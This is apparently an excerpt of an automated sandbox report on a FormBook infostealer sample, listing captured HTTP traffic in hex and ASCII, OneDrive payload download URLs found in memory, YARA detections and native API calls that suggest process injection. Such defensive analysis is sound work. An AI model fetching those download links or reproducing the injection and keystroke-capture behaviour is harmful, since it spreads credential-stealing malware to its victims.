74 75 74 63 41 37 32 31 38 4f 54 44 52 43 4c 4b 36 52 67 31 72 5f 6a 76 37 6c 48 73 78 6a 4b 4c 4c 42 62 62 42 4d 36 32 35 43 31 34 69 2d 30 33 6e 38 56 45 65 72 50 61 4b 65 6d 36 6f 41 67 78 78 76 75 57 44 59 34 5a 48 79 34 66 54 38 69 75 52 6e 6f 62 53 31 54 41 77 5f 7e 70 37 78 35 6f 45 77 44 51 71 6a 34 4c 62 56 58 57 42 54 64 51 65 6b 65 39 51 58 37 56 34 66 6e 39 6c 4d 4d 76 4a 34 45 64 4f 31 51 4e 74 4e 37 4e 6d 33 41 41 4b 2d 4d 78 34 4f 33 41 67 44 54 5f 68 52 59 74 61 79 30 75 59 45 31 4b 65 4f 33 58 48 42 4d 32 6a 54 36 54 7e 4f 55 63 44 5a 65 61 72 57 39 51 43 59 6b 42 56 44 7e 73 28 37 76 39 56 5f 6f 45 47 62 75 74 33 5f 71 77 4e 74 46 67 64 38 73 39 6c 54 43 62 56 59 61 38 63 5a 28 75 57 44 76 2d 77 49 31 63 64 65 77 39 30 45 42 41 70 6a 54 5f 47 51 46 4f 39 73 49 54 30 37 30 68 44 6b 37 4c 77 44 43 30 6e 51 6f 51 75 51 69 6b 4f 4c 37 6b 53 58 7e 39 6c 2d 77 2d 58 7a 6e 6f 5a 4e 64 48 73 63 7e 32 54 4e 78 49 64 71 49 6d 35 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: xL3hLB=BuAOzsSr5vOfc898bbbjCUPZg610p7MQUPPSzqKMNNwo3yRnWeKGT0EShRtF863MlaVXDMvbwyWoezQUiD5CtutcA7218OTDRCLK6Rg1r_jv7lHsxjKLLBbbBM625C14i-03n8VEerPaKem6oAgxxvuWDY4ZHy4fT8iuRnobS1TAw_~p7x5oEwDQqj4LbVXWBTdQeke9QX7V4fn9lMMvJ4EdO1QNtN7Nm3AAK-Mx4O3AgDT_hRYtay0uYE1KeO3XHBM2jT6T~OUcDZearW9QCYkBVD~s(7v9V_oEGbut3_qwNtFgd8s9lTCbVYa8cZ(uWDv-wI1cdew90EBApjT_GQFO9sIT070hDk7LwDC0nQoQuQikOL7kSX~9l-w-XznoZNdHsc~2TNxIdqIm5A).
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Apr 2020 00:52:20 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 61 32 32 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sa22/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Urls found in memory or binary dataShow sources
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp, filename1.exe, 0000000C.00000002.918462632.00000000008FE000.00000004.00000001.sdmp, filename1.exe, 0000001A.00000003.1262802101.00000000007E0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmpString found in binary or memory: http://mscrl.%
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digi3Am
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp, filename1.exe, 0000000C.00000002.918462632.00000000008FE000.00000004.00000001.sdmp, filename1.exe, 0000001A.00000003.1262802101.00000000007E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp, filename1.exe, 0000000C.00000002.918462632.00000000008FE000.00000004.00000001.sdmp, filename1.exe, 0000001A.00000003.1262802101.00000000007E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000000.893559028.0000000007B92000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000000.897157265.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/
Source: filename1.exe, 00000005.00000002.932606540.0000000000850000.00000004.00000020.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/32
Source: filename1.exe, 00000005.00000003.829801656.000000000088D000.00000004.00000001.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/E
Source: filename1.exe, 00000005.00000003.829801656.000000000088D000.00000004.00000001.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/U
Source: filename1.exe, 00000005.00000003.829801656.000000000088D000.00000004.00000001.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/g
Source: filename1.exe, 00000005.00000003.829732223.00000000008E3000.00000004.00000001.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4m6mKZSuQwkXEGymg7hEk0kp6mUmdmxbOOGLs_djyrPR8HMUKzbvAr7Ilver4dVuMn
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp, filename1.exe, 00000005.00000003.829801656.000000000088D000.00000004.00000001.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mCaW0IYh1142nzLVtBXWOcELews40HL9i3tI6S1VZ6BwvDTHEv88MF42IgqPKYOX8
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mCaW0IYh1142nzLVtBXWOcELews40HL9i3tI6S1VZ6BwvDTHEv88M_
Source: filename1.exe, 0000001A.00000003.1262802101.00000000007E0000.00000004.00000001.sdmpString found in binary or memory: https://hmhxvw.dm.files.1drv.com/y4mDHUFfQ2g1XTQrB-cYwN_hG6Cxc6i0TPSf0h8A5pxArHU7tJntTru2LQqeUciZ-eZ
Source: filename1.exe, 00000005.00000002.932606540.0000000000850000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
Source: filename1.exe, 00000005.00000002.932606540.0000000000850000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/)
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp, filename1.exe, 00000005.00000002.932606540.0000000000850000.00000004.00000020.sdmp, filename1.exe, 00000008.00000002.888713543.00000000020A0000.00000040.00000001.sdmp, filename1.exe, 0000000A.00000002.890492359.00000000004F0000.00000040.00000001.sdmp, filename1.exe, 0000000C.00000002.915983254.00000000004F0000.00000040.00000001.sdmp, gdi4hxdb6.exe, 00000017.00000002.1215308297.00000000021B0000.00000040.00000001.sdmp, gdi4hxdb6.exe, 00000018.00000002.1218332130.00000000004F0000.00000040.00000001.sdmp, filename1.exe, 00000019.00000002.1251116860.00000000020F0000.00000040.00000001.sdmp, filename1.exe, 0000001A.00000002.1277558142.00000000004F0000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=569F732A389E1EA2&resid=569F732A389E1EA2%21411&authkey=ABTtM_3
Source: filename1.exe, 00000005.00000003.830071150.00000000008B7000.00000004.00000001.sdmp, filename1.exe, 0000000C.00000002.918462632.00000000008FE000.00000004.00000001.sdmp, filename1.exe, 0000001A.00000003.1262802101.00000000007E0000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: filename1.exe, 00000002.00000002.820542037.0000000000700000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000005.00000002.936093552.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.896346552.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.931730236.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000001A.00000002.1277253347.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000001A.00000002.1282450545.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.890369559.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000000.901044828.000000000D3B2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000C.00000002.914336084.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000C.00000002.922687997.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000005.00000002.936093552.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.936093552.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.896346552.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.896346552.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.931730236.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.931730236.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001A.00000002.1277253347.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.1277253347.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001A.00000002.1282450545.000000001F2B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.1282450545.000000001F2B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.890369559.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.890369559.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.901044828.000000000D3B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.914336084.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.914336084.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.922687997.000000001F2B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.922687997.000000001F2B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Potential malicious icon foundShow sources
Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeCode function: 1_2_004F5A06 NtProtectVirtualMemory,1_2_004F5A06
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeCode function: 1_2_004F01AB EnumWindows,NtSetInformationThread,TerminateProcess,1_2_004F01AB
Source: C:\Users\user\Desktop\#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeCode function: 1_2_004F02BC NtSetInformationThread,TerminateProcess,1_2_004F02BC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 2_2_022E5A06 NtProtectVirtualMemory,2_2_022E5A06
Source: C:\Users\user\subfolder1\filename1.exeCode function: 2_2_022E1F11 NtWriteVirtualMemory,2_2_022E1F11
Source: C:\Users\user\subfolder1\filename1.exeCode function: 2_2_022E01AB EnumWindows,NtSetInformationThread,TerminateProcess,2_2_022E01AB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 2_2_022E2206 NtWriteVirtualMemory,2_2_022E2206
Source: C:\Users\user\subfolder1\filename1.exeCode function: 2_2_022E02BC NtSetInformationThread,TerminateProcess,2_2_022E02BC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 2_2_022E20B3 NtWriteVirtualMemory,2_2_022E20B3
Source: C:\Users\user\subfolder1\filename1.exeCode function: 2_2_022E2360 NtWriteVirtualMemory,2_2_022E2360
Source: C:\Users\user\subfolder1\filename1.exeCode function: 2_2_022E1FA9 NtWriteVirtualMemory,2_2_022E1FA9
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A750 NtCreateFile,LdrInitializeThunk,5_2_1F41A750
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A700 NtProtectVirtualMemory,LdrInitializeThunk,5_2_1F41A700
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A720 NtResumeThread,LdrInitializeThunk,5_2_1F41A720
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A610 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_1F41A610
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A6A0 NtCreateSection,LdrInitializeThunk,5_2_1F41A6A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A540 NtDelayExecution,LdrInitializeThunk,5_2_1F41A540
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A560 NtQuerySystemInformation,LdrInitializeThunk,5_2_1F41A560
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A5F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_1F41A5F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A410 NtQueryInformationToken,LdrInitializeThunk,5_2_1F41A410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A480 NtMapViewOfSection,LdrInitializeThunk,5_2_1F41A480
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A4A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_1F41A4A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A360 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_1F41A360
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A3E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_1F41A3E0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A240 NtReadFile,LdrInitializeThunk,5_2_1F41A240
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A2D0 NtClose,LdrInitializeThunk,5_2_1F41A2D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A710 NtQuerySection,5_2_1F41A710
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A780 NtOpenDirectoryObject,5_2_1F41A780
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A650 NtQueueApcThread,5_2_1F41A650
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A6D0 NtCreateProcessEx,5_2_1F41A6D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41BD40 NtSuspendThread,5_2_1F41BD40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A520 NtEnumerateKey,5_2_1F41A520
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A5A0 NtWriteVirtualMemory,5_2_1F41A5A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A460 NtOpenProcess,5_2_1F41A460
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41B470 NtOpenThread,5_2_1F41B470
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A470 NtSetInformationFile,5_2_1F41A470
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41B410 NtOpenProcessToken,5_2_1F41B410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A430 NtQueryVirtualMemory,5_2_1F41A430
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41ACE0 NtCreateMutant,5_2_1F41ACE0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A350 NtQueryValueKey,5_2_1F41A350
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A370 NtQueryInformationProcess,5_2_1F41A370
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A310 NtEnumerateValueKey,5_2_1F41A310
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A3D0 NtCreateKey,5_2_1F41A3D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A260 NtWriteFile,5_2_1F41A260
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A220 NtWaitForSingleObject,5_2_1F41A220
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41BA30 NtSetContextThread,5_2_1F41BA30
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A2F0 NtQueryInformationFile,5_2_1F41A2F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41A800 NtSetValueKey,5_2_1F41A800
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_1F41B0B0 NtGetContextThread,5_2_1F41B0B0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_004F01AB EnumWindows,NtSetInformationThread,5_2_004F01AB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_004F5A06 NtProtectVirtualMemory,5_2_004F5A06
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_004F5DAD NtSetInformationThread,5_2_004F5DAD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_004F603D NtSetInformationThread,5_2_004F603D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_004F60F0 NtSetInformationThread,5_2_004F60F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_004F6265 NtSetInformationThread,5_2_004F6265
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_004F02BC NtSetInformationThread,5_2_004F02BC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_004F6376 NtSetInformationThread,5_2_004F6376
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_004F5DB6 NtSetInformationThread,5_2_004F5DB6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_004F5E4B NtSetInformationThread,5_2_004F5E4B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_004F5EF5 NtSetInformationThread,5_2_004F5EF5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 5_2_004F5F8E NtSetInformationThread,5_2_004F5F8E
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A5A06 NtProtectVirtualMemory,8_2_020A5A06
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A1F11 NtWriteVirtualMemory,8_2_020A1F11
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A01AB EnumWindows,NtSetInformationThread,TerminateProcess,8_2_020A01AB
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A5DAD NtResumeThread,8_2_020A5DAD
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A2206 NtWriteVirtualMemory,8_2_020A2206
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A603D NtResumeThread,8_2_020A603D
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A5E4B NtResumeThread,8_2_020A5E4B
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A6265 NtResumeThread,8_2_020A6265
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A02BC NtSetInformationThread,TerminateProcess,8_2_020A02BC
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A20B3 NtWriteVirtualMemory,8_2_020A20B3
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A60F0 NtResumeThread,8_2_020A60F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A5EF5 NtResumeThread,8_2_020A5EF5
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A2360 NtWriteVirtualMemory,8_2_020A2360
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A6376 NtResumeThread,8_2_020A6376
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A5F8E NtResumeThread,8_2_020A5F8E
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A1FA9 NtWriteVirtualMemory,8_2_020A1FA9
Source: C:\Users\user\subfolder1\filename1.exeCode function: 8_2_020A5DB6 NtResumeThread,8_2_020A5DB6
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A750 NtCreateFile,LdrInitializeThunk,10_2_1F40A750
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A700 NtProtectVirtualMemory,LdrInitializeThunk,10_2_1F40A700
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A720 NtResumeThread,LdrInitializeThunk,10_2_1F40A720
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A610 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_1F40A610
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A6A0 NtCreateSection,LdrInitializeThunk,10_2_1F40A6A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A540 NtDelayExecution,LdrInitializeThunk,10_2_1F40A540
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A560 NtQuerySystemInformation,LdrInitializeThunk,10_2_1F40A560
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A5F0 NtReadVirtualMemory,LdrInitializeThunk,10_2_1F40A5F0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A410 NtQueryInformationToken,LdrInitializeThunk,10_2_1F40A410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A480 NtMapViewOfSection,LdrInitializeThunk,10_2_1F40A480
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A4A0 NtUnmapViewOfSection,LdrInitializeThunk,10_2_1F40A4A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A360 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_1F40A360
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A3E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_1F40A3E0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A240 NtReadFile,LdrInitializeThunk,10_2_1F40A240
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A2D0 NtClose,LdrInitializeThunk,10_2_1F40A2D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A710 NtQuerySection,10_2_1F40A710
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A780 NtOpenDirectoryObject,10_2_1F40A780
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A650 NtQueueApcThread,10_2_1F40A650
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A6D0 NtCreateProcessEx,10_2_1F40A6D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40BD40 NtSuspendThread,10_2_1F40BD40
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A520 NtEnumerateKey,10_2_1F40A520
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A5A0 NtWriteVirtualMemory,10_2_1F40A5A0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A460 NtOpenProcess,10_2_1F40A460
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A470 NtSetInformationFile,10_2_1F40A470
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40B470 NtOpenThread,10_2_1F40B470
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40B410 NtOpenProcessToken,10_2_1F40B410
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A430 NtQueryVirtualMemory,10_2_1F40A430
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40ACE0 NtCreateMutant,10_2_1F40ACE0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A350 NtQueryValueKey,10_2_1F40A350
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A370 NtQueryInformationProcess,10_2_1F40A370
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A310 NtEnumerateValueKey,10_2_1F40A310
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A3D0 NtCreateKey,10_2_1F40A3D0
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A260 NtWriteFile,10_2_1F40A260
Source: C:\Users\user\subfolder1\filename1.exeCode function: 10_2_1F40A220 NtWaitForSingleObject,10_2_1F40A220
